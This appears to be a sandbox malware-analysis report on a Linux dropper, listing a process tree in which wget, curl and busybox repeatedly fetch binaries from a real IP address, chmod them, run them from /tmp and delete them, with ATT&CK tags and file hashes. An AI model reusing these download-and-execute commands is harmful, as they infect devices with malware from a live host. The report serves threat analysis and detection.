/usr/bin/wgetwget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:937
-
-
/bin/chmodchmod 777 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil./2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm 2bzCW1x9LykIxcO2Tbs7eefvTRIjtleOil2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:943
-
-
/bin/chmodchmod 777 PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff./PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm PO3tXEHa3zKtcSh7sDc20GioPz4Cc1Ozff2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:949
-
-
/bin/chmodchmod 777 OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v4./OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm OL3EBoGbOLZSHvus7ILXhnkyd4E0m603v42⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:955
-
-
/bin/chmodchmod 777 LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC./LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm LoOdnpq11TE7x9riM4NLs5Ui5Ch0jkc8oC2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:961
-
-
/bin/chmodchmod 777 pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC./pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm pstocrnn33XyZPJSPVD6DADzQDT0PtgRbC2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:967
-
-
/bin/chmodchmod 777 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX3./6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 6ptZcjU66hOGfYYvBKEbqfM9bQrWFpCGX32⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:973
-
-
/bin/chmodchmod 777 UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW./UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm UxqcSNZqp1IYcncasXk5AcEMl5LQKOK2hW2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ./k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:981
-
-
/bin/rmrm k9OuBTk2q1Cb7E1aA6hrVvCqIPzGgI3WSQ2⤵
- System Network Configuration Discovery
PID:982
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97